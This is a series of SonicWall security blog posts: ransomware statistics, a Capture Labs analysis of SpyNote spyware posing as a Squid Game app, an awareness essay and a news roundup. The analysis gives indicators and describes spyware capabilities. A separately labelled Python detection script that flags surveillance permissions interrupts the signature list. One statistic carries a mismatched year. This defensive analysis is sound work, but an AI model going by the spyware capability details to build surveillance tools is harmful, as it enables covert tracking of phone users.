“The real-world damage caused by these attacks is beyond anecdotal at this point. It’s a serious national and global problem that has already taken a toll on businesses and governments everywhere,” said Conner.

With a predicted 714 million ransomware attacks by the end of the year, the grace period for companies and individuals to increase their protections and change their behavior has come to an abrupt end.

“The techniques deployed by ransomware actors have evolved well beyond the smash-and-grab attacks from just a few years ago,” said SonicWall Vice President of Platform Architecture Dmitriy Ayrapetov. “Today’s cybercriminals demonstrate deliberate reconnaissance, planning and execution to surgically deploy toolchains targeting enterprise and government infrastructure. This results in larger victims and leads to higher ransoms.”

Squid Game themed Android malware hides SpyNote spyware

The series Squid Game has been a global phenomenon in the last few weeks, and malware writers are using this popularity as a means to spread their malicious creations. We have started seeing numerous malicious Android apps use the name and icons of Squid Game. One of the highlights was SpyNote, which has been masquerading as popular Android apps.

We have reported previously on the Android spyware SpyNote, which masquerades as popular applications. It uses the popularity of these apps to spread the infection, and in this case it is using the popularity of Squid Game to do the same.

  • Application Name: Squid Game Fake Call 1
  • Package Name: cmf0.c3b5bm90zq.patch
  • MD5: 785a9475c1088a798512ca6ab6d8b0f1

The app requests a large number of suspicious permissions for an application that does nothing more than ‘Fake Call’:

SpyNote requests accessibility services and device admin privileges once installed and executed:

SpyNote can install a legitimate APK present in the resources – res/raw/google.apk. It uses this to present a legitimate-looking accessibility services entry when executed.

Upon execution the icon disappears from the app drawer, but in the background the malware starts performing malicious actions. A few of its functions are listed below:

  • The app enumerates the applications installed on the device.
  • It uses a hardcoded server address and port number and later communicates with that server over sockets.
  • We identified multiple malicious APKs linked to this campaign, since they communicate with the same server; the VirusTotal graph below highlights this.
  • It captures details about the device that the perpetrators can use to identify the victim and gather additional information. The following were identified:
    • Device manufacturer
    • Device model
    • OS version
    • SIM
    • Wifi
    • Bluetooth
    • Location
  • It has access to call logs and can make calls from the infected device.

SpyNote has been known to masquerade as popular Android apps. Its authors are adept at selecting trending topics and modifying the malware’s look and feel to match them. We anticipate that more malware writers will follow this trend and use the popularity of Squid Game to spread malware.

SonicWall Capture Labs provides protection against multiple threats associated with this campaign using the signatures listed below:
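A defender-side triage check for the traits listed above, as an added example (not SonicWall Capture Labs code and not anything taken from the sample): it parses a decoded AndroidManifest.xml together with the APK’s file listing, flags the permission set against what a ‘fake call’ app could plausibly need, records the accessibility-service and device-admin registrations, and notes any second APK carried under res/raw. The manifest, package name, class names and scoring weights are constructed assumptions for illustration; in practice the manifest would come from apktool or androguard and the listing from `zipfile`.

```python
"""Static triage of an Android manifest for SpyNote-style capability abuse.

Added example, not SonicWall's or the malware author's code.  The manifest
and archive listing below are constructed to mirror the behaviours in the
write-up (accessibility service, device admin, call logs, device and
location fingerprinting, an embedded APK under res/raw); the package name,
class names and weights are assumptions, not values from the real sample.
"""
import json
import xml.etree.ElementTree as ET
from typing import Dict, List

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"
PERM_ATTR = f"{{{ANDROID_NS}}}permission"

# Permissions a "fake call" novelty app has no plausible need for, weighted
# (assumed weights) by how much surveillance or persistence they enable.
SUSPICIOUS_PERMISSIONS: Dict[str, int] = {
    "android.permission.READ_CALL_LOG": 3,
    "android.permission.CALL_PHONE": 2,
    "android.permission.ACCESS_FINE_LOCATION": 3,
    "android.permission.READ_PHONE_STATE": 2,
    "android.permission.ACCESS_WIFI_STATE": 1,
    "android.permission.BLUETOOTH": 1,
    "android.permission.QUERY_ALL_PACKAGES": 2,
    "android.permission.RECEIVE_BOOT_COMPLETED": 2,
}
ACCESSIBILITY_PERM = "android.permission.BIND_ACCESSIBILITY_SERVICE"
DEVICE_ADMIN_PERM = "android.permission.BIND_DEVICE_ADMIN"

# Constructed sample manifest (not the real sample's).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="example.fakecall.sample">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
  <uses-permission android:name="android.permission.BLUETOOTH"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Fake Call">
    <service android:name=".A11yService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""
# Constructed archive listing, in the shape zipfile.ZipFile.namelist() returns.
SAMPLE_ENTRIES = ["AndroidManifest.xml", "classes.dex", "res/raw/google.apk",
                  "resources.arsc"]


def triage_manifest(manifest_xml: str, archive_entries: List[str]) -> Dict:
    """Score a decoded manifest plus the APK's file listing for spyware traits."""
    root = ET.fromstring(manifest_xml)
    perms = [e.get(NAME_ATTR, "") for e in root.iter("uses-permission")]
    flagged = sorted({p for p in perms if p in SUSPICIOUS_PERMISSIONS})
    score = sum(SUSPICIOUS_PERMISSIONS[p] for p in flagged)

    # An accessibility service lets the app read and drive other apps' UI;
    # a device-admin receiver resists uninstallation.  Both are strong signals.
    accessibility = any(s.get(PERM_ATTR) == ACCESSIBILITY_PERM
                        for s in root.iter("service"))
    device_admin = any(r.get(PERM_ATTR) == DEVICE_ADMIN_PERM
                       for r in root.iter("receiver"))
    score += 4 * accessibility + 4 * device_admin

    # A second APK shipped under res/raw is how the sample above carries a
    # legitimate app to front its accessibility-services entry.
    embedded = [e for e in archive_entries
                if e.startswith("res/raw/") and e.lower().endswith(".apk")]
    score += 3 * len(embedded)

    if score >= 10:
        verdict = "high"
    elif score >= 5:
        verdict = "medium"
    else:
        verdict = "low"
    return {
        "package": root.get("package"),
        "flagged_permissions": flagged,
        "accessibility_service": accessibility,
        "device_admin": device_admin,
        "embedded_apks": embedded,
        "score": score,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(json.dumps(triage_manifest(SAMPLE_MANIFEST, SAMPLE_ENTRIES), indent=2))
```

The permission list alone is noisy (a legitimate dialer also holds CALL_PHONE), which is why the accessibility-service and device-admin registrations and the embedded APK carry the heaviest weights: together they are the combination the write-up describes and one a novelty app has no reason to exhibit.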

  • AndroidOS.SpyNote.GN
  • AndroidOS.SpyNote.PT
  • AndroidOS.SpyNote.SP
  • AndroidOS.SpyNote.SC

Why Cybersecurity Must be First

If you think that cybersecurity is something that only people who manage data centers need to worry about, you’d better think again.

The reasons why cybersecurity first should resonate with everyone are all over the news. Ransomware attacks rose to 304.6 million during the first six months in 2020, up 62% over 2019, according to our own widely quoted Mid-Year Update on the 2021 SonicWall Cyber Threat Report.

And ransomware volume continues to break records. Through the first three quarters of 2021, SonicWall Capture Labs recorded another historic 148% year-to-date spike. Through September 2021, we’ve seen more than 495 million ransomware attempts globally.

Again, much of this rise is credited to the highly distributed workforces caused by the pandemic. However, these stats point to an underlying weakness in cybersecurity, and it’s all about OUR behavior.

Skipping Security, Raising Risk

Working from home blurs the lines between personal space and corporate security. A recent story in CPO Magazine revealed that a shocking 30% of remote workers who consider themselves IT professionals say that they circumvent or ignore corporate security policies when they get in the way of getting work done.

Another surprise: 91% of survey participants agreed that they felt pressure to compromise security for productivity, with 76% saying that sometimes security had to take a backseat to business needs. But then, 83% of the respondents admitted that these attitudes had created a “ticking time bomb” for a breach. And these are people who should know the risks very well.

Why does it matter?

Times have changed. The criminals are out there in droves. They are motivated by profit, and they want your data and, ideally, your money too. Unfortunately, our primary means of communication – text, email, instant messaging – make everyone accessible targets. Those of us who don’t know the basics of security, or worse yet, ignore security measures, are the ones who are putting everyone else at risk.

Bottom line, if you’re not making security a priority today, a hacker will come along – eventually – and help change your mind. The new generation of hackers is bold; they know that people are the weakest link, and they’re ready to attack.

Cybersecurity is everyone’s business.

There’s an expectation in polite society for people to think about good manners and hygiene. This is because such rules make it easier for everyone to feel comfortable in social situations. So when we follow social hygiene rules – like washing hands and covering our mouths when we cough or sneeze – we convey expectations on social quality.

Odd then that we don’t think about good manners and hygiene when it comes to using computers and our digital devices. Think about people who do things like let their antivirus software expire or insist on using old tech that we know is hackable. What about folks who cavalierly use passwords like ‘12345678’? What do these behaviors say to everyone who is in our sphere of communication?

Stop thinking about technology and hackers for a moment and look at this as a holistic problem. If the survey about IT professionals is remotely accurate, and if the threats are as real as the data says, it means our attitude toward security needs serious adjustment.

Establish a #CybersecurityFirst Mindset

How do we get to a level of care that avoids security risks? We start by making sure that everyone is aware and able to make themselves more resilient to hacking. It sounds complex but comes down to knowing the difference between what’s considered poor and good behavior.

For instance, poor behavior may cause people to assume that computers and digital devices are safe and that nobody cares about the single user plugging away at an accounting spreadsheet in a coffee shop. Good behavior takes personal responsibility and recognizes that being online has definite and inherent risks. Some risks are far more severe than others, but above all poor behavior (like denying there’s a risk) raises not only your chances of getting hacked but also raises risks for everyone who connects with you.

Prevention is a Full-Time Job

Even experts who take the best precautions can’t always prevent hacks and virus infections. So, along with accepting personal responsibility, we make it harder for hackers by creating layers of security:

  • Use and maintain antivirus software and a firewall. Contrary to some myths, people who use PCs, Macs, phones and pads are equally exposed and should have active antivirus programs, firewalls, malware sniffers, and VPN. Install patches (automatic updates) and keep your firewalls up-to-date. Hackers scan for people with old or expired software. And, if you don’t have either, you’re just a sitting duck.
  • Establish your own personal online usage guidelines. You can start with the rules and guidelines from your company. The rules are usually simple enough. Many are simple common sense: don’t share passwords, use good passwords, think before clicking (any link) and always be cautious about installing unknown or untested software and IoT devices.
  • Double-check email attachments. When it comes to phishing and ransomware, you can never be sure about an unexpected text message, email, or phone call. Hackers are very clever and adept at making email look like it comes from someone you know or a company you trust. Before opening attachments or clicking links, verify the identity of the sender.
  • Trust your instincts. Attackers are constantly releasing new viruses. So, scan documents and attachments with antivirus software before opening them. If an email or text message looks suspicious, delete it. Suppose it’s really important, someone will try to contact you again. Always remember technology can only help so much, so trust your instincts!

Be Cyber-Resilient

The entire Cybersecurity Awareness Campaign created by CISA is intended to raise our awareness about the risks WE ALL FACE. For example, when we share #CybersecurityFirst we encourage everyone around us to be more watchful and vigilant about our security. But the effort goes far beyond hashtags and slogans.

When we educate ourselves and help stakeholders, we’re taking a firm stand about where we are in the long-term journey to safety. Read SonicWall’s Ultimate Enterprise Ransomware Guide and see where we are in developing systems that are secure and resilient to ransomware and other threats.

But remember, there’s no quick fix, no “set-and-forget” software, no universal rules for cyber-resilience. Good cybersecurity technology like virtual firewall platforms, physical firewalls, and other security services help, but good behavior is where the real work begins.

Cybersecurity News & Trends – 10-22-21

The news outlets are back to quoting the Mid-Year Update to the 2021 SonicWall Cyber Threat Report, with a big hit in Germany in Handelsblatt, a major news outlet. In industry news, analysts debate the significance of “killware,” hackers are stealing telecom records, hosting admins sentenced with RICO charges, Dark Web goes darker, Macs are still safer, and beware of YouTube trojans.


SonicWall in the News

The invisible war – how global hacker gangs threaten our security and prosperity

Handelsblatt (Germany): An outstanding article in one of Germany’s most important daily newspapers mentions SonicWall as an expert in cybersecurity and quotes the 2021 Cyber Threat Report Mid-Year Update. The authors cite several vital stats from the report to explain the rise of various threats that have weakened cybersecurity throughout the world. The article appeared online and in the print issue of the publication.

SonicWall ‘Returns Choice’ to Customers by Securing Different Network Environments

Security Brief (Asia): SonicWall has declared that organizations should no longer change how they operate to secure their networks, devices and people, prompting the company to bring ‘customer choice’ back into its range of cybersecurity solutions.

Protect any network combination

LANline (Germany): This article picked up SonicWall’s media alert on protecting virtual, hybrid, cloud-based and local systems with SonicWall.

SonicWall Webinar: Can small companies and branches survive the crisis?

Infopoint Security (Germany): This article promotes a SonicWall webinar that shows how small businesses can best protect themselves during the “crisis” of increased cyberattacks.

Could your company recover from a ransomware attack?

BizJournals (U.S.): Citing SonicWall’s mid-year update on the 2021 Cyber Threat Report, the author notes the sharp rise in ransomware attacks in North America as a reason for companies to create contingency plans.

How to Create a Relevant Cybersecurity Strategy

Accounting Web (U.S.): Using SonicWall’s Mid-Year Update on the 2021 Cyber Threat Report, the author illustrates the sharp rise in cybersecurity attacks. The article is mostly about how CPAs and other accounting professionals play a crucial role in protecting financial data. However, the author also provides an overview of the most common cyberattacks, such as malware and phishing, and offers tips on making sure your organization has the proper protections in place.

‘Clumsy’ BlackByte Malware Reuses Crypto Keys, Worms into Networks

Dark Reading (U.S.): A unique malware named “BlackByte” was discovered during a recent incident response engagement. The malware reportedly avoids Russian computers and uses a single symmetric key for encrypting every compromised system. Additionally, the report cites SonicWall’s “Cyber Threat Report: Mid-Year Update” and notes that the number of ransomware attacks in the first half of the year rose 150% to almost 305 million.

The Ransom Disclosure Act Proposed — Gives 48 Hours to Report Ransom Payments

LinkedIn Pulse: Citing Ransom Disclosure Act legislation proposed in the U.S. Senate, the author offers a “hard-numbers perspective” using data from the Mid-Year Update on the 2021 SonicWall Cyber Threat Report: ransomware surged to a staggering 304.7 million attempted attacks within SonicWall Capture Labs’ Capture Threat Network, which monitors and collects information from global devices.


Industry News

DHS Secretary: “Killware” Malware Designed to Do Real-World Harm

CPO Magazine: This article opens with comments made by U.S. Department of Homeland Security Secretary Alejandro Mayorkas, who asserts that “killware is poised to be world’s next breakout cybersecurity threat.” The reference is to recent attacks on water treatment plants and hospitals where hackers could – in theory – trigger events that may harm or kill people. Mayorkas’ claim appears to be backed up by research from Gartner that projects that threat actors will be weaponizing operational environments to harm and kill people within the next four years. While the danger is real, other analysts believe that the “hype is bigger than the threat, for now.” While the attacks on SolarWinds and the Colonial Pipeline are very worrisome, and the recent attempted attack on a water treatment plant in Florida is alarming in the extreme, they are not necessarily harbingers of imminent danger. Since nearly all cybercrime is motivated by profit, we need to define… “exactly when a given cyberattack moves from being a purely criminal matter to a national security threat,” said one analyst. “If cyberattacks, especially those perpetrated across international boundaries, regularly cause bodily harm or loss of life, they will receive treatment as a threat to national security.”

Cybercrime Group Hacking Telecoms to Steal Phone Records

Gizmodo: A new report shows that a particular hacker group, believed to be based in China, has been targeting telecommunication companies all over the world. The report, which goes into a significant amount of detail, shows that the hackers behind the campaign have managed to infiltrate 13 different global telecoms in the span of just two years. Reuters reports that this has included exfiltrating “calling records and text messages” directly from carriers.

Hosting Administrators Sentenced for Helping Cybercrime Gangs

Bleeping Computer: Two Eastern European men were sentenced to prison on Racketeer Influenced Corrupt Organization (RICO) charges for bulletproof hosting services used by multiple cybercrime operations to target U.S. organizations. They provided cybercrime-affiliated clients with the infrastructure needed to host exploit kits and run malicious campaigns distributing spam emails and malware for roughly seven years, between 2008 and 2015.

The Dark Web Goes Darker and Busier

TechSpot News: Cybercrime services cost less than $500, and stolen data now spreads 11 times faster than it did six years ago, according to a recent study by BitGlass. Why this matters: The dark web is not only alive and kicking, it’s growing more dangerous than ever.

Cybersecurity Offers Jobs, High Wages — If Enough People Can Be Trained

Argus Leader: As people consider careers or new options in work, high-paying jobs in traditional fields like health may come to mind, but one industry is prospering from protecting the data of others. Cybersecurity, the protection of computer systems and networks, is emerging as a promising industry with more than enough jobs. The issue? There aren’t enough faculty to train people to fill that work.

Macs Still Targeted Mostly with Adware, Less with Malware

Dark Reading: For people who rely on Macs, the news is a little better. According to an ongoing study of threats, the top 10 categories of digital threats on macOS are all adware programs, with only a sliver of the share of victims affected by actual malware. Apple Macs are not immune to malicious attacks. Still, outside of some significant nation-state efforts, new research shows that bad actors continue to use adware as the method of choice to make money from infecting the macOS operating system.

Massive Campaign Uses YouTube to Push Password-Stealing Malware

Tech Times: Widespread malware campaigns are creating YouTube videos to distribute password-stealing trojans to unsuspecting viewers. As initially reported by Bleeping Computer, the video descriptions may contain links that lead to password-stealing trojan malware. These infections quietly run on a computer while stealing passwords, screenshots of active windows, cookies, credit cards stored in browsers, FTP credentials, and arbitrary files chosen by the threat actors. When installed, the malware communicates with a Command & Control server, where it waits for commands from the attacker, which could include running additional malware. According to this report, the best way to avoid the attack is not to click links in the video description.


In Case You Missed It